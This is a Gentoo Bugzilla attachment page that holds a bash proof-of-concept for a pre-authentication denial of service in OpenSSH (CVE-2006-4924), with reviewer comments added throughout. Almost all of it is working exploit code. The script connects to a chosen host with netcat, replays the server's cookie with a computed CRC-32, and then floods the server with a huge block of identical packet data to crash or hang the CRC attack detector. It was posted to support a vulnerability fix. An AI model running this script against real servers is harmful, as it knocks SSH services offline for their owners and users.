Gentoo's Bugzilla – Attachment 97942 Details for
Bug 148228
net-misc/openssh Multiple minor issues CVE-2006-4924 CVE-2006-4925
demonstration exploit
openssh-exploit.sh (text/plain), 4.86 KB, created by
Tavis Ormandy (RETIRED)
on 2006-09-24 07:13:20 UTC
Description:
demonstration exploit
Filename:
MIME Type:
Creator:
Tavis Ormandy (RETIRED)
Created:
2006-09-24 07:13:20 UTC
Size:
4.86 KB
#!/bin/bash
#
# OpenSSH CRC compensation attack detection DoS PoC.
# Tavis Ormandy <taviso@google.com>
#
# Yes, I really did implement crc-32 in bash.
#
# usage: script <hostname>
#
# Review context: attached as a demonstration to Gentoo bug 148228
# (net-misc/openssh, CVE-2006-4924 / CVE-2006-4925). The script's own header
# names the CRC compensation attack detector, which matches the public
# description of CVE-2006-4924 -- confirm against the advisory.
# Nothing below sends credentials: everything happens before authentication,
# so exposure depends only on whether the listener accepts the handshake the
# script starts with.
# NOTE(review): the usage line omits the optional second argument (port).

# victim hostname
hostname=${1:-localhost}
port=${2:-22}

# where the fifo is created to communicate with netcat
# NOTE(review): /tmp/nc.<pid> is a predictable name in a world-writable
# directory; mkfifo's exit status is not checked, so a path pre-created by
# another local user would be opened as-is. A private directory from
# `mktemp -d` would avoid that.
fifo=/tmp/nc.$$

# make the fifos
mkfifo ${fifo}.in
mkfifo ${fifo}.out

# pre-calculated crc32 for packet header
declare -i crc=0xb2240279

# crc lookup table
# 256 entries, one per possible byte value, consumed by the two update loops
# further down.
declare -a crc32tab=( 0x00000000 0x77073096 0xee0e612c 0x990951ba 0x076dc419
    0x706af48f 0xe963a535 0x9e6495a3 0x0edb8832 0x79dcb8a4 0xe0d5e91e 0x97d2d988
    0x09b64c2b 0x7eb17cbd 0xe7b82d07 0x90bf1d91 0x1db71064 0x6ab020f2 0xf3b97148
    0x84be41de 0x1adad47d 0x6ddde4eb 0xf4d4b551 0x83d385c7 0x136c9856 0x646ba8c0
    0xfd62f97a 0x8a65c9ec 0x14015c4f 0x63066cd9 0xfa0f3d63 0x8d080df5 0x3b6e20c8
    0x4c69105e 0xd56041e4 0xa2677172 0x3c03e4d1 0x4b04d447 0xd20d85fd 0xa50ab56b
    0x35b5a8fa 0x42b2986c 0xdbbbc9d6 0xacbcf940 0x32d86ce3 0x45df5c75 0xdcd60dcf
    0xabd13d59 0x26d930ac 0x51de003a 0xc8d75180 0xbfd06116 0x21b4f4b5 0x56b3c423
    0xcfba9599 0xb8bda50f 0x2802b89e 0x5f058808 0xc60cd9b2 0xb10be924 0x2f6f7c87
    0x58684c11 0xc1611dab 0xb6662d3d 0x76dc4190 0x01db7106 0x98d220bc 0xefd5102a
    0x71b18589 0x06b6b51f 0x9fbfe4a5 0xe8b8d433 0x7807c9a2 0x0f00f934 0x9609a88e
    0xe10e9818 0x7f6a0dbb 0x086d3d2d 0x91646c97 0xe6635c01 0x6b6b51f4 0x1c6c6162
    0x856530d8 0xf262004e 0x6c0695ed 0x1b01a57b 0x8208f4c1 0xf50fc457 0x65b0d9c6
    0x12b7e950 0x8bbeb8ea 0xfcb9887c 0x62dd1ddf 0x15da2d49 0x8cd37cf3 0xfbd44c65
    0x4db26158 0x3ab551ce 0xa3bc0074 0xd4bb30e2 0x4adfa541 0x3dd895d7 0xa4d1c46d
    0xd3d6f4fb 0x4369e96a 0x346ed9fc 0xad678846 0xda60b8d0 0x44042d73 0x33031de5
    0xaa0a4c5f 0xdd0d7cc9 0x5005713c 0x270241aa 0xbe0b1010 0xc90c2086 0x5768b525
    0x206f85b3 0xb966d409 0xce61e49f 0x5edef90e 0x29d9c998 0xb0d09822 0xc7d7a8b4
    0x59b33d17 0x2eb40d81 0xb7bd5c3b 0xc0ba6cad 0xedb88320 0x9abfb3b6 0x03b6e20c
    0x74b1d29a 0xead54739 0x9dd277af 0x04db2615 0x73dc1683 0xe3630b12 0x94643b84
    0x0d6d6a3e 0x7a6a5aa8 0xe40ecf0b 0x9309ff9d 0x0a00ae27 0x7d079eb1 0xf00f9344
    0x8708a3d2 0x1e01f268 0x6906c2fe 0xf762575d 0x806567cb 0x196c3671 0x6e6b06e7
    0xfed41b76 0x89d32be0 0x10da7a5a 0x67dd4acc 0xf9b9df6f 0x8ebeeff9 0x17b7be43
    0x60b08ed5 0xd6d6a3e8 0xa1d1937e 0x38d8c2c4 0x4fdff252 0xd1bb67f1 0xa6bc5767
    0x3fb506dd 0x48b2364b 0xd80d2bda 0xaf0a1b4c 0x36034af6 0x41047a60 0xdf60efc3
    0xa867df55 0x316e8eef 0x4669be79 0xcb61b38c 0xbc66831a 0x256fd2a0 0x5268e236
    0xcc0c7795 0xbb0b4703 0x220216b9 0x5505262f 0xc5ba3bbe 0xb2bd0b28 0x2bb45a92
    0x5cb36a04 0xc2d7ffa7 0xb5d0cf31 0x2cd99e8b 0x5bdeae1d 0x9b64c2b0 0xec63f226
    0x756aa39c 0x026d930a 0x9c0906a9 0xeb0e363f 0x72076785 0x05005713 0x95bf4a82
    0xe2b87a14 0x7bb12bae 0x0cb61b38 0x92d28e9b 0xe5d5be0d 0x7cdcefb7 0x0bdbdf21
    0x86d3d2d4 0xf1d4e242 0x68ddb3f8 0x1fda836e 0x81be16cd 0xf6b9265b 0x6fb077e1
    0x18b74777 0x88085ae6 0xff0f6a70 0x66063bca 0x11010b5c 0x8f659eff 0xf862ae69
    0x616bffd3 0x166ccf45 0xa00ae278 0xd70dd2ee 0x4e048354 0x3903b3c2 0xa7672661
    0xd06016f7 0x4969474d 0x3e6e77db 0xaed16a4a 0xd9d65adc 0x40df0b66 0x37d83bf0
    0xa9bcae53 0xdebb9ec5 0x47b2cf7f 0x30b5ffe9 0xbdbdf21c 0xcabac28a 0x53b39330
    0x24b4a3a6 0xbad03605 0xcdd70693 0x54de5729 0x23d967bf 0xb3667a2e 0xc4614ab8
    0x5d681b02 0x2a6f2b94 0xb40bbe37 0xc30c8ea1 0x5a05df1b 0x2d02ef8d );

# NOTE(review): $hostname and $port are expanded unquoted here and in the nc
# call below, so they undergo word splitting and globbing.
printf "[*] OpenSSH Pre-Auth DoS PoC by taviso@google.com\n" >&2
printf "[*] Attacking %s...\n" $hostname >&2

# launch netcat coprocess
# Runs in the background; the fifos are removed only after nc exits.
(nc -q0 $hostname $port < $fifo.in > $fifo.out; rm -f $fifo.in $fifo.out) &

# open file descriptors to coprocess
# fd 3 writes to the server (via nc), fd 4 reads the server's replies.
exec 3>${fifo}.in 4<${fifo}.out

# send identification
# The "SSH-1.8" prefix presumably steers the server onto its SSH protocol 1
# code path -- confirm against the server's version-exchange logic. A server
# limited to protocol 2 (sshd_config "Protocol 2") would be expected to end
# the exchange here. The banner text crosses the wire in cleartext, but it is
# trivially changed, so treat it as a weak detection signature at best.
printf "SSH-1.8-OpenSSH DoS Demo -- taviso@google.com\n" >&3

# read server key and spoof bytes (i only care about the spoof bytes)
read server_identification <&4
printf "[*] remote server identifies as %s.\n" "${server_identification}" >&2

# read the cookie
# Hex-dumps the first 18 bytes of the server's next message and keeps fields
# 11-18 of the space-separated output, i.e. eight bytes as two-digit hex.
cookie="$(hexdump -n 18 -e '"" 8/1 "%02x " " "'<&4 | cut -d" " -f11-18)"

printf "[*] IP spoofing cookie was %s.\n" "${cookie}" >&2

# now send my response
# 0x0000083d = 2109 declared bytes for this first packet.
printf "\x00\x00\x08\x3d" >&3 # packet length
printf "\x00\x00\x00\x03" >&3 # packet type
printf "\x03" >&3 # cipher type

# print spoof bytes
# Echoes the server's cookie back: each space in the hex string becomes "\x"
# so printf emits the raw bytes.
printf "\x${cookie// /\x}" >&3

# now calculate checksum of spoof bytes
# Table-driven CRC-32 step, one byte per iteration: index the table with the
# low byte of (crc XOR input) and XOR the entry with crc shifted right by 8.
for i in ${cookie}; do
    declare -i buf=0x${i}
    let 'crc = crc32tab[(crc ^ buf) & 0xff] ^ (crc >> 8)'
done

# now send some random crap for padding.
# 2095 bytes of 0x41, each folded into the running CRC as it is sent.
for ((i = 0; i < 2095; i++)); do
    printf "\x41" >&3
    let 'crc = crc32tab[(crc ^ 0x41) & 0xff] ^ (crc >> 8)'
done

printf "[*] checksum should be %#x\n" $crc >&2

# now send the checksum to server
# Emits the CRC most-significant byte first; the inner printf builds the
# "\xNN" escapes that the outer printf then turns into raw bytes.
printf "$(printf "\\\x%x\\\x%x\\\x%x\\\x%x" $(((crc >> 24) & 0xff)) \
    $(((crc >> 16) & 0xff)) \
    $(((crc >> 8) & 0xff)) \
    $(((crc >> 0) & 0xff)))" >&3

# Second packet: 0x0003fff8 = 262136 declared bytes.
printf "\x00\x03\xff\xf8" >&3 # packet length

# junk
# 262144 NUL bytes, so every block of the payload is identical. Presumably
# this is the repeated-block input that the detector named in the header
# handles badly -- confirm against the advisory for CVE-2006-4924.
perl -e 'print "\x00"x"262144"' >&3

# close file descriptors
exec 3>&- 4<&-

printf "[*] All done.\n" >&2
Attachments on
bug 148228
:
97507
| 97942